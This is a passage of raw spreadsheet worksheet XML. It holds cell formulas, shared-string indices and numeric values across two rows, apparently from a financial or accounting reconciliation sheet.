        <f t="shared" si="126"/>
        <v>56</v>
      </c>
      <c r="DG93" s="106">
        <f t="shared" si="20"/>
        <v>0</v>
      </c>
      <c r="DH93" s="106">
        <f t="shared" si="127"/>
        <v>56</v>
      </c>
      <c r="DI93" s="106">
        <f t="shared" si="128"/>
        <v>56</v>
      </c>
      <c r="DJ93" s="106">
        <f t="shared" si="129"/>
        <v>0</v>
      </c>
      <c r="DK93" s="107">
        <f t="shared" si="104"/>
        <v>0</v>
      </c>
      <c r="DL93" s="106">
        <f t="shared" si="105"/>
        <v>0</v>
      </c>
      <c r="DM93" s="108" t="s">
        <v>1612</v>
      </c>
      <c r="DN93" s="108">
        <v>3.0</v>
      </c>
      <c r="DO93" s="108">
        <v>22418.0</v>
      </c>
      <c r="DP93" s="101" t="s">
        <v>12</v>
      </c>
      <c r="DQ93" s="108" t="s">
        <v>1612</v>
      </c>
      <c r="DR93" s="108">
        <v>3.0</v>
      </c>
      <c r="DS93" s="108">
        <v>22418.0</v>
      </c>
      <c r="DT93" s="108" t="s">
        <v>1612</v>
      </c>
      <c r="DU93" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DV93" s="108" t="str">
        <f t="shared" si="154"/>
        <v>2016897, 2016898, 50447</v>
      </c>
      <c r="DW93" s="108" t="s">
        <v>1612</v>
      </c>
      <c r="DX93" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DY93" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DZ93" s="108" t="s">
        <v>12</v>
      </c>
      <c r="EA93" s="108">
        <v>0.0</v>
      </c>
      <c r="EB93" s="108">
        <v>0.0</v>
      </c>
      <c r="EC93" s="109">
        <v>24570.0</v>
      </c>
      <c r="ED93" s="109">
        <v>56.0</v>
      </c>
      <c r="EE93" s="109">
        <v>57.0</v>
      </c>
      <c r="EF93" s="109">
        <v>22418.0</v>
      </c>
      <c r="EG93" s="109">
        <v>78.0</v>
      </c>
      <c r="EH93" s="109">
        <v>22496.0</v>
      </c>
      <c r="EI93" s="109">
        <v>0.0</v>
      </c>
      <c r="EJ93" s="109">
        <v>0.0</v>
      </c>
      <c r="EK93" s="109">
        <v>0.0</v>
      </c>
      <c r="EL93" s="109">
        <v>0.0</v>
      </c>
      <c r="EM93" s="109">
        <v>56.0</v>
      </c>
      <c r="EN93" s="109">
        <v>57.0</v>
      </c>
      <c r="EO93" s="109">
        <v>22418.0</v>
      </c>
      <c r="EP93" s="109">
        <v>56.0</v>
      </c>
      <c r="EQ93" s="109">
        <v>22474.0</v>
      </c>
      <c r="ER93" s="110">
        <f t="shared" si="130"/>
        <v>56</v>
      </c>
      <c r="ES93" s="110">
        <f t="shared" si="131"/>
        <v>56</v>
      </c>
      <c r="ET93" s="110">
        <f t="shared" si="132"/>
        <v>0</v>
      </c>
      <c r="EU93" s="110">
        <f t="shared" si="133"/>
        <v>57</v>
      </c>
      <c r="EV93" s="110">
        <f t="shared" si="134"/>
        <v>57</v>
      </c>
      <c r="EW93" s="110">
        <f t="shared" si="135"/>
        <v>0</v>
      </c>
      <c r="EX93" s="110">
        <f t="shared" si="136"/>
        <v>22496</v>
      </c>
      <c r="EY93" s="110">
        <f t="shared" si="137"/>
        <v>22474</v>
      </c>
      <c r="EZ93" s="110">
        <f t="shared" si="138"/>
        <v>0</v>
      </c>
      <c r="FA93" s="110">
        <f t="shared" si="106"/>
        <v>0</v>
      </c>
      <c r="FB93" s="110">
        <f t="shared" si="107"/>
        <v>0</v>
      </c>
      <c r="FC93" s="111" t="s">
        <v>1613</v>
      </c>
      <c r="FD93" s="111">
        <v>8.0</v>
      </c>
      <c r="FE93" s="111">
        <v>22496.0</v>
      </c>
      <c r="FF93" s="101" t="s">
        <v>229</v>
      </c>
      <c r="FG93" s="111" t="s">
        <v>1614</v>
      </c>
      <c r="FH93" s="111">
        <v>6.0</v>
      </c>
      <c r="FI93" s="111">
        <v>22481.0</v>
      </c>
      <c r="FJ93" s="111" t="s">
        <v>1613</v>
      </c>
      <c r="FK93" s="111" t="s">
        <v>229</v>
      </c>
      <c r="FL93" s="111" t="str">
        <f t="shared" si="155"/>
        <v>2002749, 2002752, 2016897, 2016898, 2018208, 2002192, 2002822, 50447</v>
      </c>
      <c r="FM93" s="111">
        <v>2106897.0</v>
      </c>
      <c r="FN93" s="111" t="s">
        <v>1615</v>
      </c>
      <c r="FO93" s="111">
        <v>2018208.0</v>
      </c>
      <c r="FP93" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FQ93" s="111">
        <v>1.0</v>
      </c>
      <c r="FR93" s="111">
        <v>5.0</v>
      </c>
      <c r="FS93" s="112">
        <v>26860.0</v>
      </c>
      <c r="FT93" s="112">
        <v>71.0</v>
      </c>
      <c r="FU93" s="112">
        <v>74.0</v>
      </c>
      <c r="FV93" s="112">
        <v>22418.0</v>
      </c>
      <c r="FW93" s="112">
        <v>78.0</v>
      </c>
      <c r="FX93" s="112">
        <v>22496.0</v>
      </c>
      <c r="FY93" s="112">
        <v>0.0</v>
      </c>
      <c r="FZ93" s="112">
        <v>0.0</v>
      </c>
      <c r="GA93" s="112">
        <v>0.0</v>
      </c>
      <c r="GB93" s="112">
        <v>0.0</v>
      </c>
      <c r="GC93" s="112">
        <v>63.0</v>
      </c>
      <c r="GD93" s="112">
        <v>64.0</v>
      </c>
      <c r="GE93" s="112">
        <v>22418.0</v>
      </c>
      <c r="GF93" s="112">
        <v>63.0</v>
      </c>
      <c r="GG93" s="112">
        <v>22481.0</v>
      </c>
      <c r="GH93" s="113">
        <f t="shared" si="139"/>
        <v>71</v>
      </c>
      <c r="GI93" s="113">
        <f t="shared" si="140"/>
        <v>63</v>
      </c>
      <c r="GJ93" s="113">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="GK93" s="113">
        <f t="shared" si="142"/>
        <v>74</v>
      </c>
      <c r="GL93" s="113">
        <f t="shared" si="143"/>
        <v>64</v>
      </c>
      <c r="GM93" s="113">
        <f t="shared" si="144"/>
        <v>0</v>
      </c>
      <c r="GN93" s="113">
        <f t="shared" si="145"/>
        <v>22496</v>
      </c>
      <c r="GO93" s="113">
        <f t="shared" si="146"/>
        <v>22481</v>
      </c>
      <c r="GP93" s="113">
        <f t="shared" si="147"/>
        <v>0</v>
      </c>
      <c r="GQ93" s="114">
        <f t="shared" si="108"/>
        <v>0</v>
      </c>
      <c r="GR93" s="113">
        <f t="shared" si="109"/>
        <v>0</v>
      </c>
      <c r="GS93" s="115" t="s">
        <v>13</v>
      </c>
      <c r="GT93" s="94" t="s">
        <v>1616</v>
      </c>
      <c r="GU93" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GV93" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GW93" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GX93" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GY93" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GZ93" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HA93" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HB93" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HC93" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HD93" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HE93" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HF93" s="117" t="str">
        <f t="shared" si="66"/>
        <v>-</v>
      </c>
      <c r="HG93" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HH93" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HI93" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HJ93" s="93" t="s">
        <v>12</v>
      </c>
      <c r="HK93" s="93" t="str">
        <f t="shared" si="51"/>
        <v>SI</v>
      </c>
      <c r="HL93" s="93">
        <v>10658.0</v>
      </c>
      <c r="HM93" s="93">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
      <c r="HN93" s="93">
        <v>0.0</v>
      </c>
      <c r="HO93" s="93">
        <v>0.0</v>
      </c>
      <c r="HP93" s="93">
        <v>0.0</v>
      </c>
      <c r="HQ93" s="118">
        <f t="shared" si="53"/>
        <v>0</v>
      </c>
      <c r="HR93" s="118">
        <f t="shared" si="54"/>
        <v>0</v>
      </c>
      <c r="HS93" s="118">
        <f t="shared" si="55"/>
        <v>0</v>
      </c>
      <c r="HT93" s="139" t="s">
        <v>12</v>
      </c>
      <c r="HU93" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HV93" s="119" t="s">
        <v>1281</v>
      </c>
      <c r="HW93" s="119">
        <v>2.0</v>
      </c>
      <c r="HX93" s="119">
        <v>54526.0</v>
      </c>
      <c r="HY93" s="120" t="s">
        <v>12</v>
      </c>
      <c r="HZ93" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IA93" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IB93" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IC93" s="120">
        <v>14984.0</v>
      </c>
      <c r="ID93" s="120">
        <v>9999.0</v>
      </c>
      <c r="IE93" s="120">
        <v>9999.0</v>
      </c>
      <c r="IF93" s="120">
        <v>14984.0</v>
      </c>
      <c r="IG93" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IH93" s="120" t="s">
        <v>12</v>
      </c>
      <c r="II93" s="99" t="s">
        <v>12</v>
      </c>
      <c r="IJ93" s="98" t="str">
        <f t="shared" si="56"/>
        <v>SI</v>
      </c>
      <c r="IK93" s="99">
        <v>14116.0</v>
      </c>
      <c r="IL93" s="99">
        <v>1.0</v>
      </c>
      <c r="IM93" s="121">
        <f t="shared" si="159"/>
        <v>1</v>
      </c>
      <c r="IN93" s="122" t="s">
        <v>230</v>
      </c>
      <c r="IO93" s="98">
        <v>1.0</v>
      </c>
      <c r="IP93" s="123">
        <f t="shared" si="58"/>
        <v>1</v>
      </c>
      <c r="IQ93" s="118">
        <f t="shared" si="59"/>
        <v>1</v>
      </c>
      <c r="IR93" s="118">
        <f t="shared" si="60"/>
        <v>1</v>
      </c>
      <c r="IS93" s="124" t="s">
        <v>13</v>
      </c>
      <c r="IT93" s="127"/>
      <c r="IU93" s="127"/>
      <c r="IV93" s="127"/>
      <c r="IW93" s="127"/>
      <c r="IX93" s="127"/>
      <c r="IY93" s="127"/>
      <c r="IZ93" s="127"/>
      <c r="JA93" s="127"/>
      <c r="JB93" s="127"/>
      <c r="JC93" s="127"/>
      <c r="JD93" s="127"/>
      <c r="JE93" s="127"/>
      <c r="JF93" s="127"/>
      <c r="JG93" s="127"/>
      <c r="JH93" s="127"/>
      <c r="JI93" s="127"/>
      <c r="JJ93" s="127"/>
      <c r="JK93" s="127"/>
      <c r="JL93" s="127"/>
      <c r="JM93" s="127"/>
      <c r="JN93" s="127"/>
      <c r="JO93" s="127"/>
      <c r="JP93" s="127"/>
      <c r="JQ93" s="127"/>
      <c r="JR93" s="127"/>
      <c r="JS93" s="127"/>
      <c r="JT93" s="127"/>
      <c r="JU93" s="127"/>
      <c r="JV93" s="127"/>
      <c r="JW93" s="127"/>
      <c r="JX93" s="127"/>
      <c r="JY93" s="127"/>
      <c r="JZ93" s="127"/>
      <c r="KA93" s="127"/>
      <c r="KB93" s="127"/>
      <c r="KC93" s="127"/>
      <c r="KD93" s="127"/>
      <c r="KE93" s="127"/>
      <c r="KF93" s="127"/>
      <c r="KG93" s="127"/>
      <c r="KH93" s="127"/>
      <c r="KI93" s="127"/>
      <c r="KJ93" s="127"/>
      <c r="KK93" s="127"/>
      <c r="KL93" s="127"/>
      <c r="KM93" s="127"/>
      <c r="KN93" s="127"/>
      <c r="KO93" s="127"/>
      <c r="KP93" s="127"/>
      <c r="KQ93" s="127"/>
      <c r="KR93" s="127"/>
      <c r="KS93" s="127"/>
      <c r="KT93" s="127"/>
      <c r="KU93" s="127"/>
      <c r="KV93" s="127"/>
      <c r="KW93" s="127"/>
      <c r="KX93" s="127"/>
      <c r="KY93" s="127"/>
      <c r="KZ93" s="127"/>
      <c r="LA93" s="127"/>
      <c r="LB93" s="127"/>
      <c r="LC93" s="127"/>
      <c r="LD93" s="127"/>
      <c r="LE93" s="127"/>
      <c r="LF93" s="127"/>
      <c r="LG93" s="127"/>
      <c r="LH93" s="127"/>
      <c r="LI93" s="127"/>
      <c r="LJ93" s="127"/>
      <c r="LK93" s="127"/>
      <c r="LL93" s="127"/>
      <c r="LM93" s="127"/>
      <c r="LN93" s="127"/>
      <c r="LO93" s="127"/>
      <c r="LP93" s="127"/>
      <c r="LQ93" s="127"/>
      <c r="LR93" s="127"/>
      <c r="LS93" s="127"/>
      <c r="LT93" s="127"/>
      <c r="LU93" s="127"/>
      <c r="LV93" s="127"/>
      <c r="LW93" s="127"/>
      <c r="LX93" s="127"/>
      <c r="LY93" s="127"/>
      <c r="LZ93" s="127"/>
      <c r="MA93" s="127"/>
      <c r="MB93" s="127"/>
      <c r="MC93" s="127"/>
      <c r="MD93" s="127"/>
      <c r="ME93" s="127"/>
      <c r="MF93" s="127"/>
      <c r="MG93" s="127"/>
      <c r="MH93" s="127"/>
      <c r="MI93" s="127"/>
      <c r="MJ93" s="127"/>
      <c r="MK93" s="127"/>
      <c r="ML93" s="127"/>
      <c r="MM93" s="127"/>
      <c r="MN93" s="127"/>
      <c r="MO93" s="127"/>
      <c r="MP93" s="127"/>
      <c r="MQ93" s="127"/>
      <c r="MR93" s="127"/>
      <c r="MS93" s="127"/>
      <c r="MT93" s="127"/>
      <c r="MU93" s="127"/>
      <c r="MV93" s="127"/>
      <c r="MW93" s="127"/>
      <c r="MX93" s="127"/>
      <c r="MY93" s="127"/>
      <c r="MZ93" s="127"/>
      <c r="NA93" s="127"/>
      <c r="NB93" s="127"/>
      <c r="NC93" s="127"/>
      <c r="ND93" s="127"/>
      <c r="NE93" s="127"/>
      <c r="NF93" s="127"/>
      <c r="NG93" s="127"/>
      <c r="NH93" s="127"/>
      <c r="NI93" s="127"/>
      <c r="NJ93" s="127"/>
      <c r="NK93" s="127"/>
      <c r="NL93" s="127"/>
      <c r="NM93" s="127"/>
      <c r="NN93" s="127"/>
      <c r="NO93" s="127"/>
      <c r="NP93" s="127"/>
      <c r="NQ93" s="127"/>
      <c r="NR93" s="127"/>
      <c r="NS93" s="127"/>
      <c r="NT93" s="127"/>
      <c r="NU93" s="127"/>
      <c r="NV93" s="127"/>
      <c r="NW93" s="127"/>
      <c r="NX93" s="127"/>
      <c r="NY93" s="127"/>
    </row>
    <row r="94" ht="153.75" customHeight="1">
      <c r="B94" s="89" t="s">
        <v>1373</v>
      </c>
      <c r="C94" s="90" t="s">
        <v>12</v>
      </c>
      <c r="D94" s="90" t="s">
        <v>210</v>
      </c>
      <c r="E94" s="90" t="s">
        <v>1510</v>
      </c>
      <c r="F94" s="90" t="s">
        <v>1511</v>
      </c>
      <c r="G94" s="91" t="s">
        <v>1605</v>
      </c>
      <c r="H94" s="90" t="s">
        <v>1606</v>
      </c>
      <c r="I94" s="92" t="s">
        <v>1574</v>
      </c>
      <c r="J94" s="92" t="s">
        <v>1617</v>
      </c>
      <c r="K94" s="92" t="s">
        <v>1618</v>
      </c>
      <c r="L94" s="93" t="s">
        <v>375</v>
      </c>
      <c r="M94" s="93">
        <v>1.0</v>
      </c>
      <c r="N94" s="93">
        <v>1.0</v>
      </c>
      <c r="O94" s="93">
        <v>0.0</v>
      </c>
      <c r="P94" s="93">
        <v>1.0</v>
      </c>
      <c r="Q94" s="93">
        <v>1.0</v>
      </c>
      <c r="R94" s="93">
        <v>1.0</v>
      </c>
      <c r="S94" s="93">
        <v>0.0</v>
      </c>
      <c r="T94" s="94" t="s">
        <v>12</v>
      </c>
      <c r="U94" s="95" t="s">
        <v>224</v>
      </c>
      <c r="V94" s="96" t="s">
        <v>1609</v>
      </c>
      <c r="W94" s="96" t="s">
        <v>1619</v>
      </c>
      <c r="X94" s="97" t="s">
        <v>512</v>
      </c>
      <c r="Y94" s="96" t="s">
        <v>512</v>
      </c>
      <c r="Z94" s="126" t="s">
        <v>1532</v>
      </c>
      <c r="AA94" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AB94" s="95" t="s">
        <v>224</v>
      </c>
      <c r="AC94" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AD94" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AE94" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AF94" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AG94" s="98" t="s">
        <v>226</v>
      </c>
      <c r="AH94" s="99" t="s">
        <v>1440</v>
      </c>
      <c r="AI94" s="99" t="s">
        <v>228</v>
      </c>
      <c r="AJ94" s="99" t="s">
        <v>225</v>
      </c>
      <c r="AK94" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AL94" s="100">
        <v>0.0</v>
      </c>
      <c r="AM94" s="100">
        <v>0.0</v>
      </c>
      <c r="AN94" s="101" t="s">
        <v>12</v>
      </c>
      <c r="AO94" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AP94" s="100">
        <v>0.0</v>
      </c>
      <c r="AQ94" s="100">
        <v>0.0</v>
      </c>
      <c r="AR94" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AS94" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AT94" s="100" t="str">
        <f t="shared" si="158"/>
        <v>-</v>
      </c>
      <c r="AU94" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AV94" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AW94" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AX94" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AY94" s="100">
        <v>0.0</v>
      </c>
      <c r="AZ94" s="100">
        <v>0.0</v>
      </c>
      <c r="BA94" s="102">
        <v>1799791.0</v>
      </c>
      <c r="BB94" s="102">
        <v>0.0</v>
      </c>
      <c r="BC94" s="102">
        <v>0.0</v>
      </c>
      <c r="BD94" s="102">
        <v>0.0</v>
      </c>
      <c r="BE94" s="102">
        <v>0.0</v>
      </c>
      <c r="BF94" s="102">
        <v>0.0</v>
      </c>
      <c r="BG94" s="102">
        <v>0.0</v>
      </c>
      <c r="BH94" s="102">
        <v>0.0</v>
      </c>
      <c r="BI94" s="102">
        <v>0.0</v>
      </c>
      <c r="BJ94" s="102">
        <v>0.0</v>
      </c>
      <c r="BK94" s="102">
        <v>0.0</v>
      </c>
      <c r="BL94" s="103">
        <f t="shared" si="112"/>
        <v>0</v>
      </c>
      <c r="BM94" s="103">
        <f t="shared" si="113"/>
        <v>0</v>
      </c>
      <c r="BN94" s="103">
        <f t="shared" si="114"/>
        <v>0</v>
      </c>
      <c r="BO94" s="103">
        <f t="shared" si="115"/>
        <v>0</v>
      </c>
      <c r="BP94" s="103">
        <f t="shared" si="116"/>
        <v>0</v>
      </c>
      <c r="BQ94" s="103">
        <f t="shared" si="117"/>
        <v>0</v>
      </c>
      <c r="BR94" s="103">
        <f t="shared" si="118"/>
        <v>0</v>
      </c>
      <c r="BS94" s="103">
        <f t="shared" si="119"/>
        <v>0</v>
      </c>
      <c r="BT94" s="103">
        <f t="shared" si="120"/>
        <v>0</v>
      </c>
      <c r="BU94" s="103">
        <f t="shared" si="75"/>
        <v>0</v>
      </c>
      <c r="BV94" s="103">
        <f t="shared" si="76"/>
        <v>0</v>
      </c>
      <c r="BW94" s="104">
        <v>2012801.0</v>
      </c>
      <c r="BX94" s="104">
        <v>1.0</v>
      </c>
      <c r="BY94" s="104">
        <v>149665.0</v>
      </c>
      <c r="BZ94" s="101" t="s">
        <v>12</v>
      </c>
      <c r="CA94" s="104">
        <v>2012801.0</v>
      </c>
      <c r="CB94" s="104">
        <v>1.0</v>
      </c>
      <c r="CC94" s="104">
        <v>149665.0</v>
      </c>
      <c r="CD94" s="104">
        <v>2012801.0</v>
      </c>
      <c r="CE94" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CF94" s="104">
        <f t="shared" si="153"/>
        <v>2012801</v>
      </c>
      <c r="CG94" s="104">
        <v>2012801.0</v>
      </c>
      <c r="CH94" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CI94" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CJ94" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CK94" s="104">
        <v>0.0</v>
      </c>
      <c r="CL94" s="104">
        <v>0.0</v>
      </c>
      <c r="CM94" s="105">
        <v>1799791.0</v>
      </c>
      <c r="CN94" s="105">
        <v>14115.0</v>
      </c>
      <c r="CO94" s="105">
        <v>149661.0</v>
      </c>
      <c r="CP94" s="105">
        <v>0.0</v>
      </c>
      <c r="CQ94" s="105">
        <v>149665.0</v>
      </c>
      <c r="CR94" s="105">
        <v>149665.0</v>
      </c>
      <c r="CS94" s="105">
        <v>0.0</v>
      </c>
      <c r="CT94" s="105">
        <v>0.0</v>
      </c>
      <c r="CU94" s="105">
        <v>0.0</v>
      </c>
      <c r="CV94" s="105">
        <v>0.0</v>
      </c>
      <c r="CW94" s="105">
        <v>14115.0</v>
      </c>
      <c r="CX94" s="105">
        <v>149665.0</v>
      </c>
      <c r="CY94" s="105">
        <v>0.0</v>
      </c>
      <c r="CZ94" s="105">
        <v>149665.0</v>
      </c>
      <c r="DA94" s="105">
        <v>149665.0</v>
      </c>
      <c r="DB94" s="106">
        <f t="shared" si="122"/>
        <v>14115</v>
      </c>
      <c r="DC94" s="106">
        <f t="shared" si="123"/>
        <v>14115</v>
      </c>
      <c r="DD94" s="106">
        <f t="shared" si="124"/>
        <v>0</v>
      </c>
      <c r="DE94" s="106">
        <f t="shared" si="125"/>
        <v>149661</v>
      </c>
      <c r="DF94" s="106">
        <f t="shared" si="126"/>
        <v>149665</v>
      </c>
      <c r="DG94" s="106">
        <f t="shared" si="20"/>
        <v>0</v>
      </c>
      <c r="DH94" s="106">
        <f t="shared" si="127"/>
        <v>149665</v>
      </c>
      <c r="DI94" s="106">
        <f t="shared" si="128"/>
        <v>149665</v>
      </c>
      <c r="DJ94" s="106">
        <f t="shared" si="129"/>
        <v>0</v>
      </c>
      <c r="DK94" s="107">
        <f t="shared" si="104"/>
        <v>0</v>
      </c>
      <c r="DL94" s="106">
        <f t="shared" si="105"/>
        <v>0</v>
      </c>
      <c r="DM94" s="108" t="s">
        <v>1620</v>
      </c>
      <c r="DN94" s="108">
        <v>3.0</v>
      </c>
      <c r="DO94" s="108">
        <v>3592578.0</v>
      </c>
      <c r="DP94" s="101" t="s">
        <v>12</v>
      </c>
      <c r="DQ94" s="108" t="s">
        <v>1620</v>
      </c>
      <c r="DR94" s="108">
        <v>3.0</v>
      </c>
      <c r="DS94" s="108">
        <v>3592578.0</v>
      </c>
      <c r="DT94" s="108" t="s">
        <v>1621</v>
      </c>
      <c r="DU94" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DV94" s="108" t="str">
        <f t="shared" si="154"/>
        <v>2012801, 50447</v>
      </c>
      <c r="DW94" s="108">
        <v>2012801.0</v>
      </c>
      <c r="DX94" s="108">
        <v>50447.0</v>
      </c>
      <c r="DY94" s="108">
        <v>22953.0</v>
      </c>
      <c r="DZ94" s="108" t="s">
        <v>12</v>
      </c>
      <c r="EA94" s="108">
        <v>1.0</v>
      </c>
      <c r="EB94" s="108">
        <v>3592578.0</v>
      </c>
      <c r="EC94" s="109">
        <v>1799791.0</v>
      </c>
      <c r="ED94" s="109">
        <v>14115.0</v>
      </c>
      <c r="EE94" s="109">
        <v>149666.0</v>
      </c>
      <c r="EF94" s="109">
        <v>3442913.0</v>
      </c>
      <c r="EG94" s="109">
        <v>149665.0</v>
      </c>
      <c r="EH94" s="109">
        <v>3592578.0</v>
      </c>
      <c r="EI94" s="109">
        <v>1.0</v>
      </c>
      <c r="EJ94" s="109">
        <v>0.0</v>
      </c>
      <c r="EK94" s="109">
        <v>1.0</v>
      </c>
      <c r="EL94" s="109">
        <v>1.0</v>
      </c>
      <c r="EM94" s="109">
        <v>14115.0</v>
      </c>
      <c r="EN94" s="109">
        <v>149666.0</v>
      </c>
      <c r="EO94" s="109">
        <v>3442913.0</v>
      </c>
      <c r="EP94" s="109">
        <v>149665.0</v>
      </c>
      <c r="EQ94" s="109">
        <v>3592578.0</v>
      </c>
      <c r="ER94" s="110">
        <f t="shared" si="130"/>
        <v>14115</v>
      </c>
      <c r="ES94" s="110">
        <f t="shared" si="131"/>
        <v>14115</v>
      </c>
      <c r="ET94" s="110">
        <f t="shared" si="132"/>
        <v>1</v>
      </c>
      <c r="EU94" s="110">
        <f t="shared" si="133"/>
        <v>149666</v>
      </c>
      <c r="EV94" s="110">
        <f t="shared" si="134"/>
        <v>149666</v>
      </c>
      <c r="EW94" s="110">
        <f t="shared" si="135"/>
        <v>1</v>
      </c>
      <c r="EX94" s="110">
        <f t="shared" si="136"/>
        <v>3592578</v>
      </c>
      <c r="EY94" s="110">
        <f t="shared" si="137"/>
        <v>3592578</v>
      </c>
      <c r="EZ94" s="110">
        <f t="shared" si="138"/>
        <v>1</v>
      </c>
      <c r="FA94" s="110">
        <f t="shared" si="106"/>
        <v>1</v>
      </c>
      <c r="FB94" s="110">
        <f t="shared" si="107"/>
        <v>1</v>
      </c>
      <c r="FC94" s="111" t="s">
        <v>1622</v>
      </c>
      <c r="FD94" s="111">
        <v>8.0</v>
      </c>
      <c r="FE94" s="111">
        <v>3592723.0</v>
      </c>
      <c r="FF94" s="101" t="s">
        <v>229</v>
      </c>
      <c r="FG94" s="111" t="s">
        <v>1623</v>
      </c>
      <c r="FH94" s="111">
        <v>6.0</v>
      </c>
      <c r="FI94" s="111">
        <v>3592714.0</v>
      </c>
      <c r="FJ94" s="111" t="s">
        <v>1624</v>
      </c>
      <c r="FK94" s="111" t="s">
        <v>229</v>
      </c>
      <c r="FL94" s="111" t="str">
        <f t="shared" si="155"/>
        <v>2002192, 2002749, 2002752, 2002822, 2012801, 2012914, 50447</v>
      </c>
      <c r="FM94" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FN94" s="111" t="s">
        <v>1624</v>
      </c>
      <c r="FO94" s="111">
        <v>22953.0</v>
      </c>
      <c r="FP94" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FQ94" s="111">
        <v>1.0</v>
      </c>
      <c r="FR94" s="111">
        <v>3592714.0</v>
      </c>
      <c r="FS94" s="112">
        <v>1799791.0</v>
      </c>
      <c r="FT94" s="112">
        <v>14115.0</v>
      </c>
      <c r="FU94" s="112">
        <v>149804.0</v>
      </c>
      <c r="FV94" s="112">
        <v>3442913.0</v>
      </c>
      <c r="FW94" s="112">
        <v>149810.0</v>
      </c>
      <c r="FX94" s="112">
        <v>3592723.0</v>
      </c>
      <c r="FY94" s="112">
        <v>1.0</v>
      </c>
      <c r="FZ94" s="112">
        <v>0.0</v>
      </c>
      <c r="GA94" s="112">
        <v>1.0</v>
      </c>
      <c r="GB94" s="112">
        <v>1.0</v>
      </c>
      <c r="GC94" s="112">
        <v>14115.0</v>
      </c>
      <c r="GD94" s="112">
        <v>149798.0</v>
      </c>
      <c r="GE94" s="112">
        <v>3442913.0</v>
      </c>
      <c r="GF94" s="112">
        <v>149801.0</v>
      </c>
      <c r="GG94" s="112">
        <v>3592714.0</v>
      </c>
      <c r="GH94" s="113">
        <f t="shared" si="139"/>
        <v>14115</v>
      </c>
      <c r="GI94" s="113">
        <f t="shared" si="140"/>
        <v>14115</v>
      </c>
      <c r="GJ94" s="113">
        <f t="shared" si="141"/>
        <v>1</v>
      </c>
      <c r="GK94" s="113">
        <f t="shared" si="142"/>
        <v>149804</v>
      </c>
      <c r="GL94" s="113">
        <f t="shared" si="143"/>
        <v>149798</v>
      </c>
      <c r="GM94" s="113">
        <f t="shared" si="144"/>
        <v>1</v>
      </c>
      <c r="GN94" s="113">
        <f t="shared" si="145"/>
        <v>3592723</v>
      </c>
      <c r="GO94" s="113">
        <f t="shared" si="146"/>
        <v>3592714</v>
      </c>
      <c r="GP94" s="113">
        <f t="shared" si="147"/>
        <v>1</v>
      </c>
      <c r="GQ94" s="114">
        <f t="shared" si="108"/>
        <v>1</v>
      </c>
      <c r="GR94" s="113">
        <f t="shared" si="109"/>
        <v>1</v>
      </c>
      <c r="GS94" s="115" t="s">
        <v>13</v>
      </c>
      <c r="GT94" s="94" t="s">
        <v>1625</v>
      </c>
      <c r="GU94" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GV94" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GW94" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GX94" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GY94" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GZ94" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HA94" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HB94" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HC94" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HD94" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HE94" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HF94" s="117" t="str">
        <f t="shared" si="66"/>
        <v>-</v>
      </c>
      <c r="HG94" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HH94" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HI94" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HJ94" s="93" t="s">
        <v>12</v>
      </c>
      <c r="HK94" s="93" t="str">
        <f t="shared" si="51"/>
        <v>SI</v>
      </c>
      <c r="HL94" s="93">
        <v>737050.0</v>
      </c>
      <c r="HM94" s="93">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
      <c r="HN94" s="93">
        <v>0.0</v>
      </c>
      <c r="HO94" s="93">
        <v>0.0</v>
      </c>
      <c r="HP94" s="93">
        <v>0.0</v>
      </c>
      <c r="HQ94" s="118">
        <f t="shared" si="53"/>
        <v>0</v>
